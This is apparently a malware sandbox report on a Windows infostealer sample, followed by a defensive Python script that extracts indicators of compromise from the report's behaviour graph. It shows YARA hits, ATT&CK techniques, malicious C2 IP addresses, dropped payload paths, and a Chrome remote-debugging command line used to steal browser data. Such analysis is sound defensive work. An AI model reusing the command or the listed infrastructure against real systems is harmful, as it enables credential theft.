                    Source: Yara match  File source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR

                    Remote Access Functionality

                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe  Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Source: Yara match  File source: Process Memory Space: 7620ab885d.exe PID: 2456, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: 8469cb4d4d.exe PID: 7060, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: b285303eae.exe PID: 7044, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: b9ba85c997.exe PID: 4164, type: MEMORYSTR
                    Source: Yara match  File source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match  File source: 0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000010.00000002.2492014049.0000000002584000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 0000000B.00000002.2343637701.000001C130C03000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match  File source: 00000010.00000000.2340764340.00000000001B2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                    Source: Yara match  File source: Process Memory Space: 0a7e8af92e.exe PID: 632, type: MEMORYSTR
                    Source: Yara match  File source: Process Memory Space: DJj.exe PID: 3500, type: MEMORYSTR
                    Source: Yara match  File source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED
MITRE ATT&CK Matrix

Techniques with signature hits are listed first for each tactic, with the report's count badge in square brackets (the digits are reproduced as they came through extraction; where a cell carried more than one badge they may have run together). The names after "template:" are the remaining cells of the matrix layout, which carry no hit for this sample.

Reconnaissance: no hits. Template: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses, Network Security Appliances, Gather Victim Org Information.

Resource Development: no hits. Template: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure, Domains, DNS Server.

Initial Access: no hits. Template: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise, Compromise Software Dependencies and Development Tools, Compromise Software Supply Chain.

Execution: Windows Management Instrumentation [231]; Native API [1]; Command and Scripting Interpreter [12]; Scheduled Task/Job [2]; PowerShell [3]. Template: Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell, AppleScript, Windows Command Shell.

Persistence: DLL Side-Loading [1]; Scheduled Task/Job [2]; Registry Run Keys / Startup Folder [11]. Template: Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task.

Privilege Escalation: DLL Side-Loading [1]; Bypass User Account Control [2]; Extra Window Memory Injection [1]; Process Injection [112]; Scheduled Task/Job [2]; Registry Run Keys / Startup Folder [11]. Template: Startup Items, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task.

Defense Evasion: Disable or Modify Tools [411]; Deobfuscate/Decode Files or Information [21]; Obfuscated Files or Information [4]; Software Packing [12]; Timestomp [1]; DLL Side-Loading [1]; Bypass User Account Control [2]; File Deletion [1]; Extra Window Memory Injection [1]; Masquerading [113]; Virtualization/Sandbox Evasion [681]; Process Injection [112].

Credential Access: OS Credential Dumping [2]. Template: LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing, Input Capture, Keylogging.

Discovery: System Time Discovery [1]; File and Directory Discovery [22]; System Information Discovery [347]; Query Registry [1]; Security Software Discovery [1181]; Process Discovery [3]; Virtualization/Sandbox Evasion [681]; Application Window Discovery [1]. Template: Network Sniffing, Network Service Discovery, System Network Connections Discovery, Process Discovery.

Lateral Movement: no hits. Template: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot, Software Deployment Tools, Taint Shared Content.

Collection: Archive Collected Data [1]; Data from Local System [41]; Email Collection [1]. Template: Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging, Remote Data Staging, Screen Capture.

Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [2]; Remote Access Software [1]; Application Layer Protocol [1]. Template: Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols, Mail Protocols, DNS.

Exfiltration: no hits. Template: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol, Exfiltration Over Unencrypted Non-C2 Protocol, Exfiltration Over Physical Medium.

Impact: no hits. Template: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement, Firmware Corruption, Resource Hijacking.

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph

Behavior Graph ID: 1580355; Sample: cMTqzvmx9u.exe; Startdate: 24/12/2024; Architecture: WINDOWS; Score: 100.

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 15 other signatures.

The graph is reproduced below as a process tree. Figures in square brackets after a process name are the graph's created-registry-value / created-file counters (see the legend); each node lists its network contacts (IP, AS name, country), dropped files (path, file type) and signatures.

cMTqzvmx9u.exe [5]
    dropped: C:\Users\user\AppData\Local\...\skotes.exe (PE32); C:\Users\user\...\skotes.exe:Zone.Identifier (ASCII)
    signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Tries to detect virtualization through RDTSC time measurements
    skotes.exe
        signatures: Detected unpacking (changes PE section rights); 2 other signatures

skotes.exe [4, 67]
    network: 185.215.113.43 (WHOLESALECONNECTIONSNL, Portugal); 185.215.113.16 (WHOLESALECONNECTIONSNL, Portugal); 31.41.244.11 (AEROEXPRESS-ASRU, Russian Federation)
    dropped: C:\Users\user\AppData\...\aa8c9de034.exe (PE32+); C:\Users\user\AppData\...\f53b3c5fe2.exe (PE32); C:\Users\user\AppData\...\91732ff836.exe (PE32); 27 other malicious files
    signatures: Creates multiple autostart registry keys; Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check)
    e6e4c20fad.exe
        network: 185.215.113.206 (WHOLESALECONNECTIONSNL, Portugal)
        dropped: C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\nss3[1].dll (PE32); 10 other files (6 malicious)
        signatures: Attempt to bypass Chrome Application-Bound Encryption; 6 other signatures
        chrome.exe
            network: 239.255.255.250 (unknown, Reserved)
            chrome.exe
                network: 142.250.181.68 (GOOGLEUS, United States); 172.217.19.227 (GOOGLEUS, United States); 3 other IPs or domains
    0a7e8af92e.exe
        dropped: C:\Users\user\AppData\Roaming\...\DJj.exe (PE32)
        signatures: Multi AV Scanner detection for dropped file; Suspicious powershell command line found; Encrypted powershell cmdline option found
        DJj.exe
            network: 147.45.44.224 (FREE-NET-ASFREEnetEU, Russian Federation)
            signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); 3 other signatures
        powershell.exe
            signatures: Loading BitLocker PowerShell Module
            conhost.exe
            WmiPrvSE.exe
    b9ba85c997.exe
        dropped: C:\Users\user\...\MZHUJDVAZFQBUC9CQYK.exe (PE32); C:\Users\...8X4KAZW48ZU3YY0Y4JPME949S3Q.exe (PE32)
        signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Tries to evade debugger and weak emulator (self modifying code)
    8 other processes
        network: 149.154.167.220 (TELEGRAMRU, United Kingdom); 142.250.181.1 (GOOGLEUS, United States); 8 other IPs or domains
        dropped: C:\Program Files\...\graph.exe (PE32+)
        signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (window names); 9 other signatures
        WerFault.exe
            network: 104.208.16.94 (MICROSOFT-CORP-MSN-AS-BLOCKUS, United States)
            dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
        7ddd2a748c.exe
            network: 172.67.209.202 (CLOUDFLARENETUS, United States)
        taskkill.exe
            conhost.exe
        7 other processes
            conhost.exe; conhost.exe; conhost.exe; conhost.exe

skotes.exe
    signatures: Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

4 other processes
    network: 23.218.208.109 (AS6453US, United States); 127.0.0.1 (unknown, unknown)
    signatures: Creates files in the system32 config directory; Tries to harvest and steal browser information (history, passwords, etc)
    firefox.exe
        network: 18.66.161.98 (MIT-GATEWAYSUS, United States); 142.250.181.110 (GOOGLEUS, United States); 13 other IPs or domains
        dropped: C:\Users\user\AppData\...\gmpopenh264.dll.tmp (PE32+); C:\Users\user\...\gmpopenh264.dll (copy) (PE32+)
        firefox.exe
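The graph dump is the quickest place in a report to pull triage IOCs from, but the flattened text mixes node IDs, edges and labels on a few very long lines. The script below is an added example, not part of the Joe Sandbox report or of any tool the report names: it parses that node/edge syntax ("<node> <label> <parent>-><node>"), attributes each contacted IP and dropped file to the process that produced it, and filters out loopback and multicast addresses so only routable contacts remain. GRAPH_EXCERPT is a subset of the dump above, copied verbatim so the script runs offline; the regexes and the grouping logic are the example's own assumptions about that format.

```python
"""Pull network and file IOCs out of a flattened Joe Sandbox behaviour-graph dump."""
import ipaddress
import re
from collections import defaultdict

# Excerpt copied from the behaviour graph in the report above (node numbers,
# process names, IPs, AS names and paths are the report's own); it is only a
# subset of the full graph, chosen so the example runs offline.
GRAPH_EXCERPT = r"""
8 skotes.exe 4 67 2->8 started 13 cMTqzvmx9u.exe 5 2->13 started
17 4 other processes 2->17
130 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 8->130
132 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 8->132
134 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 8->134
88 C:\Users\user\AppData\...\aa8c9de034.exe, PE32+ 8->88 dropped
19 e6e4c20fad.exe 8->19 started 24 0a7e8af92e.exe 8->24 started
94 C:\Users\user\AppData\Local\...\skotes.exe, PE32 13->94 dropped
96 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 13->96 dropped
138 127.0.0.1 unknown unknown 17->138
110 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 19->110
34 chrome.exe 19->34 started 37 DJj.exe 24->37 started
102 239.255.255.250 unknown Reserved 34->102
104 147.45.44.224 FREE-NET-ASFREEnetEU Russian Federation 37->104
44 WerFault.exe 32->44 started
106 104.208.16.94 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 44->106
100 C:\ProgramData\Microsoft\...\Report.wer, Unicode 44->100 dropped
"""

# Process node: "<node> <name> [<regkeys> <files>] <parent>-><node> [started]".
PROC_RE = re.compile(
    r"(?<!\S)(?P<node>\d+) (?P<name>\d+ other processes|\S+?)(?: \d+)* "
    r"(?P<parent>\d+)->(?P=node)(?!\S)")
# Network node: "<node> <ip> <asn> <country...> <src>-><node>".
IP_RE = re.compile(
    r"(?<!\S)(?P<node>\d+) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) (?P<asn>\S+) "
    r"(?P<country>.*?) (?P<src>\d+)->(?P=node)(?!\S)")
# Dropped-file node: "<node> <path>, <type> <src>-><node> dropped".
DROP_RE = re.compile(
    r"(?<!\S)(?P<node>\d+) (?P<path>[A-Z]:\\.*?), (?P<ftype>\S+) "
    r"(?P<src>\d+)->(?P=node) dropped")


def parse_graph(text):
    """Return (processes, contacts, drops) parsed from one graph dump."""
    flat = " ".join(text.split())  # extraction breaks lines at arbitrary points
    processes = {m["node"]: m["name"] for m in PROC_RE.finditer(flat)}
    contacts = [(m["src"], m["ip"], m["asn"], m["country"]) for m in IP_RE.finditer(flat)]
    drops = [(m["src"], m["path"], m["ftype"]) for m in DROP_RE.finditer(flat)]
    return processes, contacts, drops


def is_routable(ip):
    """True for addresses worth blocking/hunting: drop loopback, multicast, private, reserved."""
    a = ipaddress.ip_address(ip)
    return a.is_global and not (a.is_loopback or a.is_multicast or a.is_private or a.is_reserved)


def contacts_by_process(text):
    """Map process name -> sorted routable IPs it contacted."""
    processes, contacts, _ = parse_graph(text)
    out = defaultdict(set)
    for src, ip, _asn, _country in contacts:
        if is_routable(ip):
            out[processes.get(src, f"node {src}")].add(ip)
    return {name: sorted(ips) for name, ips in out.items()}


def drops_by_process(text):
    """Map process name -> list of (path, file type) it dropped, in graph order."""
    processes, _, drops = parse_graph(text)
    out = defaultdict(list)
    for src, path, ftype in drops:
        out[processes.get(src, f"node {src}")].append((path, ftype))
    return dict(out)


def asn_summary(text):
    """Count distinct routable IPs per AS name; clusters on one AS stand out quickly."""
    _, contacts, _ = parse_graph(text)
    per_asn = defaultdict(set)
    for _src, ip, asn, _country in contacts:
        if is_routable(ip):
            per_asn[asn].add(ip)
    return {asn: len(ips) for asn, ips in sorted(per_asn.items())}


if __name__ == "__main__":
    for name, ips in contacts_by_process(GRAPH_EXCERPT).items():
        print(f"{name}: {', '.join(ips)}")
    for name, files in drops_by_process(GRAPH_EXCERPT).items():
        print(f"{name} dropped: {'; '.join(p for p, _ in files)}")
    print(asn_summary(GRAPH_EXCERPT))
```

On the excerpt, skotes.exe resolves to the three routable addresses the report attributes to it, and the loopback contact of "4 other processes" and the multicast contact of chrome.exe are filtered out, so the AS summary reflects only real egress. To run this over a full report, replace GRAPH_EXCERPT with the complete graph text; any node label whose shape differs from the three patterns above is simply skipped, so check the counts against the report before trusting the output.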

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.